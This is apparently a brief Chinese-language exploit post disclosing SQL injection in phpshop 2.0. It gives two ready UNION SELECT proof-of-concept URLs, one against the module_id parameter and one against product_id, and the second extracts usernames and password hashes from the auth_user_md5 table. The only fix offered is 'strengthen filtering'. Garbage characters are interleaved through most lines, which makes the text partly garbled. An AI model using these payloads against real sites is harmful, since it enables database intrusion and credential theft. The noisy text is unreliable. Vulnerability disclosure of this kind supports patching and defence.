标题 : phpshop 2.0 SQL Injection Vulnerability
4 g# Q: J) B% E+ _3 I2 F8 }
S' E# ?/ \8 d( y9 V* S. B作者 : By onestree
( Y/ `4 g" Z/ v下载地址 : http://code.google.com/p/phpshop/downloads/list0 `" A4 Z' `8 h( }' @9 F
测试地址: windows 7 / ubuntu+ H3 |" Z: L5 z6 W
- e6 ~8 ~ V! Y m9 j# S* Y) | / N5 Q7 }/ E1 I4 V% p; G% N
SQLi p0c:
/ L Z1 _* b# U+ G, N( g 1 N$ n! a! T8 z0 D5 a u0 q
==================
& c* A+ c0 ?0 x5 \
0 |( ^& R# m* O9 }( G' p9 J, ahttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
$ Q3 n, }! M2 c) Z4 ~1 Eunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
; j$ l: E! z! f; l5 A0 O 5 k( F. _1 ^/ F* a0 q$ ^
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
' O7 \& Q0 Y9 P0 M; v4 k$ T0 @5 ~- T! J
修复:
! H6 l8 w6 ` t4 b加强过滤
, x7 _) a9 Y; ^/ H/ n& K& c' `8 n% j0 t7 E0 U0 C2 Y
$ A" A( S3 e2 {. J$ D; x* Q |